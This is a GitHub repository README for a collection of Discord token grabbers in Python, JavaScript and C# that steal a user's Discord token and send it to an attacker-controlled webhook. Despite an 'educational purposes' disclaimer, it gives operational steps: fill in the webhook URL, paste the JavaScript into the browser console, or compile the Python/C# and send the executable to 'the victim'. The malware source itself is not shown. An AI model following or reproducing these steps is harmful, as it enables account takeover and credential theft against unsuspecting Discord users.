MRXdebug / Discord-Token-Grabbers

Discord Token Loggers Samples

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Discord Token Grabbers on Python, Javascript and C#

Simple scripts that grabs the token and sends it through a webhook

  • NOTE: Only made for educational purposes!

Usage

Put your Discord webhook url

  • Python
WEBHOOK_URL = "HERE"
  • Javascript
var webhook = "HERE"
  • C#
string WEBHOOK_URL = "HERE";

In case of using Javascript

  • Press ctrl + shift + i
  • Go to "console"
  • Paste the code and press enter

In case of using Python or C#

  • First you need to compile your code
  • Then send the executable file to the victim

Tested on:

  • Windos 10
  • Chrome

About

Discord Token Loggers Samples


Languages

Language:C# 60.2%Language:Python 32.9%Language:JavaScript 6.9%